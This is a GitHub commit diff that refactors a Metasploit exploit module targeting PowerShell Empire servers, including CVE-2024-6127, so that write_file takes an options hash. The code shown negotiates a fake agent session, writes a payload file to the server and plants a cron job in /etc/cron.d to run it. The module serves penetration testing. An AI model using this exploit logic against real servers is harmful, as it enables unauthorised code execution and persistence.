Skip to content

Commit 5ee8696

Browse files
Takahiro-YokoTakahiro-Yoko
committed
Pass a Hash as argument
1 parent bff7e48 commit 5ee8696

File tree

1 file changed

+12
-11
lines changed

1 file changed

+12
-11
lines changed

modules/exploits/linux/http/empire_skywalker.rb

Lines changed: 12 additions & 11 deletions
Original file line numberDiff line numberDiff line change
@@ -180,7 +180,13 @@ def get_staging_key
180180
staging_key
181181
end
182182

183-
def write_file(path, data, session_id, session_key, server_epoch)
183+
def write_file(path, data, session_id, session_key, opts)
184+
if datastore['CVE'] == 'CVE-2024-6127'
185+
write_file_cve_2024_6127(path, data, session_id, session_key, opts[:staging_key])
186+
return
187+
end
188+
server_epoch = opts[:server_epoch]
189+
184190
# target_url.path default traffic profile for empire agent communication
185191
# https://github.com/adaptivethreat/Empire/blob/293f06437520f4747e82e4486938b1a9074d3d51/setup/setup_database.py#L50
186192
data = create_packet(
@@ -267,6 +273,7 @@ def exploit
267273
fail_with(Failure::Unknown, "Failed to communicate with STAGE2") unless res and res.code == 200
268274
aes_decrypt(session_key, res.body)
269275

276+
opts = { staging_key: staging_key }
270277
log_path = "/var/lib/powershell-empire/empire/server/downloads/#{session_id}/agent.log"
271278

272279
else
@@ -289,6 +296,8 @@ def exploit
289296
server_epoch = body[0..9].to_i
290297
session_key = body[10..-1]
291298
print_good('Successfully negotiated an artificial Empire agent')
299+
300+
opts = { server_epoch: server_epoch }
292301
log_path = '/agent.log'
293302

294303
end
@@ -308,20 +317,12 @@ def exploit
308317
end
309318

310319
print_status("Writing payload to #{payload_path}")
311-
if datastore['CVE'] == 'CVE-2024-6127'
312-
write_file_cve_2024_6127(payload_path, payload_data, session_id, session_key, staging_key)
313-
else
314-
write_file(payload_path, payload_data, session_id, session_key, server_epoch)
315-
end
320+
write_file(payload_path, payload_data, session_id, session_key, opts)
316321

317322
cron_path = '/etc/cron.d/' + rand_text_alpha(8)
318323
print_status("Writing cron job to #{cron_path}")
319324

320-
if datastore['CVE'] == 'CVE-2024-6127'
321-
write_file_cve_2024_6127(cron_path, cron_file(cron_command), session_id, session_key, staging_key)
322-
else
323-
write_file(cron_path, cron_file(cron_command), session_id, session_key, server_epoch)
324-
end
325+
write_file(cron_path, cron_file(cron_command), session_id, session_key, opts)
325326
print_status("Waiting for cron job to run, can take up to 60 seconds")
326327

327328
register_files_for_cleanup(cron_path)

0 commit comments

Comments
 (0)